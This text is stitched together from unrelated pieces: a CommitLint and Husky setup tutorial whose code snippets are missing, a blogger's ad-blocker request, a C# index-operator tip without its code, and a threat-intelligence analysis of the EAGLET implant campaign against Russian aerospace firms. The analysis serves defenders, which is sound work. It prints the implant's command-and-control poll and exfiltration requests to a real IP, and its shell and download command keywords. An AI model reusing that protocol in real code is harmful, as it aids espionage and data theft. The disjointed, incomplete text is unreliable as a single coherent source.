CommitLint: a package to validate Commit messages
We need to install and configure CommitLint, the NPM package that does the dirty job.
This snippet tells Commitlint to use the default conventions, such as feat(api): send an email.
To test the default rules without issuing any real commit, we have to install the previous packages globally, so that they can be accessed outside the scope of the git hooks:
echo 'foo: a message with wrong format' | commitlint
and see the error messages
At this point, we still don’t have CommitLint ready to validate our commit messages. In fact, if you try to commit your changes with an invalid message, you will see that the message passes the checks (because there are no checks!), and your changes get committed.
We need to do some more steps.
First of all, we have to create a folder named .husky that will be used by Husky to understand which commands are supported.
Notice: you have to keep the dot at the beginning of the folder name: it’s .husky, not husky.
Then we need to add a new file within that folder to tell Husky that it needs to run CommitLint.
The first value is a number that expresses the severity of the rule:
0: the rule is disabled;
1: show a warning;
2: it’s an error.
The second value defines if the rule must be applied (using always), or if it must be reversed (using never).
The third value provides generic arguments for the related rule. For example, "header-max-length": [2, "always", 50], tells that the header must always have a length with <= 50 characters.
But not before helping devs with a simple trick! As you remember, when you run git commit without specifying the message, an editor appears with some hints about the structure of the commit message.
You can set your own text with hints about the structure of the messages.
You just need to create a file named .gitmessage and put some text in it, such as:
# <type>/FOO-<jira-ticket-id>: <title>
# YOU CAN WRITE WHATEVER YOU WANT HERE
# allowed types: feat | fix | hot | chore
# Example:
#
# feat/FOO-01: first commit
#
# No more than 50 chars. #### 50 chars is here: #
# Remember blank line between title and body.
# Body: Explain *what* and *why* (not *how*)
# Wrap at 72 chars. ################################## which is here: #
#
Now, we have to tell Git to use that file as a template:
git config commit.template ./.gitmessage
and.. TA-DAH! Here’s your message template!
Putting all together
Finally, we have everything in place: git hooks, commit template, and template hints.
If we run git commit, we will see an IDE open and the message we’ve defined before. Now, type A message with wrong format, save, close the editor, and you’ll see that the commit is aborted.
Now you run git commit again, you’ll see again the IDE, and type feat/FOO-123: a valid message, and you’ll see it working
Further readings
Conventional Commits is a project that lists a set of specifications for writing such good messages. You can read more here:
This new kind of commit message works well with Semantic Versioning, which can be useful to publish package versions with a meaningful version number, such as 2.0.1: 🔗 Semantic Versioning
And, to close the loop, Semantic Versioning can be easily integrated with CI pipelines. If you use .NET APIs and want to deploy your APIs to Azure using GitHub Actions, you can start from this article and add SemVer: 🔗 How to deploy .NET APIs on Azure using GitHub actions
Wrapping up
In this article, we’ve learned what are Conventional Commits, how to add them using Husky and NPM, and how to configure our folder to use such tools.
The steps we’ve seen before work for every type of application, even not related to dotnet.
So, to recap everything, we have to:
Install NPM: npm init;
Install Husky: npm install husky --save-dev;
Enable Husky: npm pkg set scripts.prepare="husky install";
Just a second! 🫷 If you are here, it means that you are a software developer.
So, you know that storage, networking, and domain management have a cost .
If you want to support this blog, please ensure that you have disabled the adblocker for this site. I configured Google AdSense to show as few ADS as possible – I don’t want to bother you with lots of ads, but I still need to add some to pay for the resources for my site.
Thank you for your understanding. – Davide
Say that you have an array of N items and you need to access an element counting from the end of the collection.
Usually, we tend to use the Length property of the array, and then subtract the number corresponding to the position we want to reach:
Yes, that’s just syntactic sugar, but it can help make your code more readable. In fact, if you have a look at the IL code generated by both examples, they are perfectly identical. IL is quite difficult to read and understand, but you can acknowledge that both syntaxes are equivalent by looking at the decompiled C# code:
Performance is not affected by this operator, so it’s just a matter of readability.
Clearly, you still have to take care of array bounds – if you access values[^55] you’ll get an IndexOutOfRangeException.
Using ^ is a nice trick that many C# developers don’t know. There are some special characters that can help us but are often not used. Like the @ operator!
SEQRITE Labs APT-Team has recently found a campaign, which has been targeting Russian Aerospace Industry. The campaign is aimed at targeting employees of Voronezh Aircraft Production Association (VASO), one of the major aircraft production entities in Russia via using товарно-транспортная накладная (TTN) documents — critical to Russian logistics operations. The entire malware ecosystem involved in this campaign is based on usage of malicious LNK file EAGLET DLL implant, further executing malicious commands and exfiltration of data.
In this blog, we will explore the technical details of the campaign. we encountered during our analysis. We will examine the various stages of this campaign, starting from deep dive into the initial infection chain to implant used in this campaign, ending with a final overview covering the campaign.
Initial Findings
Recently, on 27th of June, our team upon hunting malicious spear-phishing attachments, found a malicious email file, which surfaced on sources like VirusTotal, upon further hunting, we also found a malicious LNK file, which was responsible for execution of the malicious DLL-attachment whose file-type has been masquerading as ZIP-attachment.
Upon looking into the email, we found the file Транспортная_накладная_ТТН_№391-44_от_26.06.2025.zip which translates to Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip is basically a DLL file and upon further hunting, we found another file which is a shortcut [LNK] file, having the same name. Then, we decided to look into the workings of these files.
Infection Chain
Technical Analysis
We will break down the analysis of this campaign into three different parts, starting with looking into the malicious EML file, followed by the attachment I.e., the malicious DLL implant and the LNK file.
Stage 0 – Malicious Email File.
Well, initially, we found a malicious e-mail file, named as backup-message-10.2.2.20_9045-800282.eml , uploaded from Russian-Federation. Upon, looking into the specifics of the e-mail file.
We found that the email was sent to an employee at Voronezh Aircraft Production Association (VASO), from Transport and Logistics Centre regarding a Delivery note.
Looking in the contents of the email, we found that the message was crafted to deliver the news of recent logistics movement, also referencing a consignment note (Товарно-транспортная накладная №391-44 от 26.06.2025), the email content also urges the receiver to prepare for the delivery of a certain cargo in 2-3 days. As, we already noticed that the threat actor impersonates an individual, we also noticed that there is a malicious attachment, masquerading as ZIP file. Upon downloading, we figured out that it was a malicious DLL implant.
Apart, from the malicious DLL implant, we also hunted a malicious LNK file, with the same name, we believe has been dropped by another spear-phishing attachment, which is used to execute this DLL implant, which we have termed as EAGLET.
In the next section, we will look into the malicious LNK file.
Stage 1 – Malicious LNK File.
Upon, looking inside the LNK file, we found that it is performing some specific set of tasks which finally executes the malicious DLL file and also spawns a decoy pop-up on the screen. It does this by following manner.
Initially, it uses powershell.exe binary to run this script in background, which enumerates the masquerading ZIP file, which is the malicious EAGLET implant, then in-case it finds the malicious implant, it executes it via rundll32.exe LOLBIN, else in-case it fails to find it recursively looks for the file under %USERPROFILE% and in-case it finds, it runs it, then, if it fails to find it in that location, it looks tries to look under %TEMP% location.
Once it has found the DLL implant, it is executed and then extracts a decoy XLS file embedded within the implant, which is performed by reading the XLS file of 59904 bytes which is stored just after the starting 296960 bytes, which is then written under %TEMP% directory with named ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls. This is the purpose of the malicious LNK file, in the next section, we will look into the decoy file.
Stage 2- Looking into the decoy file.
In this section, we will look into the XLS decoy file, which has been extracted from the DLL implant.
Initially, we identified that the referenced .XLS file is associated with a sanctioned Russian entity, Obltransterminal LLC (ООО “Облтранстерминал”), which appears on the U.S. Department of the Treasury’s OFAC SDN (Specially Designated Nationals) list. The organization has been sanctioned under Executive Order 14024 for its involvement in Russia’s military-logistics infrastructure.
Then, we saw the XLS file contains details about structured fields for recording container number, type, tare weight, load capacity, and seal number, as well as vehicle and platform information. Notably, it includes checkboxes for container status—loaded, empty, or under repair—and a schematic area designated for marking physical damage on the container.
Then, we can see that the decoy contains a detailed list of container damage codes typically used in Russian logistics operations. These codes cover a wide range of structural and mechanical issues that might be identified during a container inspection. The list includes specific terms such as cracks or punctures (Трещина), deformations of top and bottom beams (Деформация верхних/нижних балок), corrosion (Сквозная коррозия), and the absence or damage of locking rods, hinges, rubber seals, plates, and corner fittings. Each damage type is systematically numbered from 1 to 24, mimicking standardized inspection documentation.
Overall, the decoy is basically about simulating an official Russian container inspection document—specifically, an Equipment Interchange Report (EIR)—used during the transfer or handover of freight containers. It includes structured fields for container specifications, seal numbers, weight, and vehicle data, along with schematic diagrams and a standardized list of 24 damage codes covering everything from cracks and deformations to corrosion and missing parts associated with Obltransterminal LLC. In, the next section, we will look into the EAGLET implant.
Stage 3 – Malicious EAGLET implant.
Initially, as we saw that the implant and loaded it into a PE-analysis tool, we could confirm that, this is a PE file, with the decoy being stored inside the overlay section, which we already saw previously.
Next, looking into the exports of this malicious DLL, we looked into the EntryPoint and unfortunately it did not contain anything interesting. Next, looking into the DllEntryPoint which lead us to the DllMain which did contain interesting code, related to malicious behavior.
The initial interesting function, which basically enumerates info on the target machine.
In this function, the code goes ahead and creates a unique GUID of the target, which will be used to identify the victim, every time the implant is executed a new GUID is generated, this mimics the behavior of session-id which aids the operator or the threat actor to gain clarity on the target.
Then, it enumerates the computer-name of the target machine along with the hostname and DNS domain name of the target machine. Once it has received it, then it goes ahead and creates a directory known as MicrosoftApppStore under the ProgramData location.
Next, using CreateThread it creates a malicious thread, which is responsible for connecting to the command-and-control[C2] IP and much more.
Next, we can see that the implant is using certain Windows networking APIs such as WinHttpOpen to initiate a HTTP session, masquerading under an uncommon looking user-agent string MicrosoftAppStore/2001.0, which then is followed by another API known as WinHtppConnect which tries to connect to the hardcoded command-and-control[C2] server which is 185.225.17.104 over port 80, in case it fails, it keeps on retrying.
In, case the implants connect to the C2, it forms a URL path which us used to send a GET request to the C2 infrastructure. The entire request body looks something like this:
GET /poll?id=<{randomly-created-GUID}&hostname={hostname}&domain={domain} HTTP/1.1Host: 185.225.17.104
After sending the request, the implant attempts to read the HTTP response from the C2 server, which may contain instructions to perform certain instructions.
Regarding the functionality, the implant supports shell-access which basically gives the C2-operator or threat actor a shell on the target machine, which can be further used to perform malicious activities.
Another feature is the download feature, in this implant, which either downloads malicious content from the server or exfiltrating required or interesting files from the target machine. One feature downloads malicious content from the server and stores it under the location C:\ProgramData\MicrosoftAppStore\. As, the C2 is currently down, while this research is being published, the files which had or have been used could not be discovered.
Later, another functionality irrelevant to this download feature also became quite evident that the implant is basically exfiltrating files from the target machine. The request body looks something like this:
POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==
Therefore, the features are as follows.
Feature
Trigger Keyword
Behavior
Purpose
Command Execution
cmd:
Executes a shell command received from the C2 server and captures the output
Remote Code Execution
File Download
download:
Downloads a file from a remote location and saves it to C:\ProgramData\MicrosoftAppStore\
Payload Staging
Exfiltration
(automatic)
Sends back the result of command execution or download status to the C2 server via HTTP POST
Data Exfiltration
That sums up the technical analysis of the EAGLET implant, next, we will look into the other part, which focuses on infrastructural knowledge and hunting similar campaigns.
Hunting and Infrastructure
Infrastructural details
In this section, we will look into the infrastructure related artefacts. Initially, the C2, which we found to be 185[.]225[.]17[.]104, which is responsible for connecting to the EAGLET implant. The C2 server is located in Romania under the ASN 39798 of MivoCloud SRL.
Well, looking into it, we found that a lot of passive DNS records were pointing to historical infrastructure previously associated with the same threat cluster which links to TA505, which have been researched by researchers at BinaryDefense. The DNS records although suggest that similar or recycled infrastructure have been used in this campaign. Also, apart from the infrastructural co-relations with TA505 only in terms of using recycled domains, we also saw some other dodgy domains pointing have DNS records pointing towards this same infrastructure. With high-confidence, we can assure that, the current campaign has no-correlation with TA505, apart from the afore-mentioned information.
Similar, to the campaign, targeting Aerospace sector, we have also found another campaign, which is targeting Russian Military sector through recruitment themed documents. We found in that campaign, the threat actor used EAGLET implant which connects to the C2, I.e., 188[.]127[.]254[.]44 which is located in Russian under the ASN 56694, belonging to LLC Smart Ape organization.
Similar Campaigns
Campaign 1 – Military Themed Targeting
Initially, we saw the URL body, and many other behavioral artefacts of the implant, which led us to another set of campaigns, with exactly similar implant, used to target Russian Military Recruitment.
This decoy was extracted from an EAGLET implant which is named as Договор_РН83_изменения.zip which translates to Contract_RN83_Changes , which has been targeting individuals and entities related to Russian Military recruitment. As, we can see that the decoy highlights multiple advantages of serving which includes house-mortgage to pension and many more advantages.
Campaign 2 – EAGLET implant with no decoy embedded
As, in the previous campaigns we saw that occasionally, the threat entity drops a malicious LNK, which executes the DLL implant and extracts the decoy present inside the implant’s overlay section, but in this, we also saw an implant, with no such decoy present inside.
Along, with these, we also saw multiple overlaps of these campaigns having similar target-interests and implant code overlap with the threat entity known as Head Mare which have been targeting Russian speaking entities initially discovered by researchers at Kaspersky.
Attribution
Attribution is an essential metric when describing a threat actor or group. It involves analyzing and correlating various domains, including Tactics, Techniques, and Procedures (TTPs), code similarities and reuse, the motivation of the threat actor, and sometimes operational mistakes such as using similar file or decoy nomenclature.
In our ongoing tracking on UNG0901, we discovered notable similarities and overlaps with threat group known as Head Mare, as identified by researchers at Kaspersky. Let us explore some of the key overlaps between Head Mare and UNG0901.
Key Overlaps Between UNG0901 and Head Mare
Tooling Arsenal:
Researchers at Kaspersky observed that Head Mare often uses a Golang based backdoor known as PhantomDL, which is often packed using software packer such as UPX, which have very simple yet functional features such as shell , download , upload , exit. Similarly, UNG0901 has also deployed EAGLET implant, which shows similar behavior and has nearly to very similar features such as shell, download, upload etc. which is programmed in C++.
File-Naming technique:
Researchers at Kaspersky observed that the PhantomDL malware is often deployed via spear-phishing with file names such as Contract_kh02_523, similarly in the campaigns which we witnessed by UNG0901, there were filenames with similar style such as Contract_RN83_Changes. And many more file-naming schemes which we found to be similar.
Motivation:
Head Mare has been targeting important entities related to Russia, whereas UNG0901 has also targeted multiple important entities belonging to Russia.
Apart from these, there are much additional and strong similarities which reinforce the connection between these two threat entities; therefore, we attribute UNG0901 threat entity shares resources and many other similarities with Head Mare, targeting Russian governmental & non-governmental entities.
Conclusion
UNG0901 or Unknown-Group-901 demonstrates a targeted cyber operation against Russia’s aerospace and defense sectors using spear-phishing emails and a custom EAGLET DLL implant for espionage and data exfiltration. UNG0901 also overlaps with Head Mare which shows multiple similarities such as decoy-nomenclature and much more.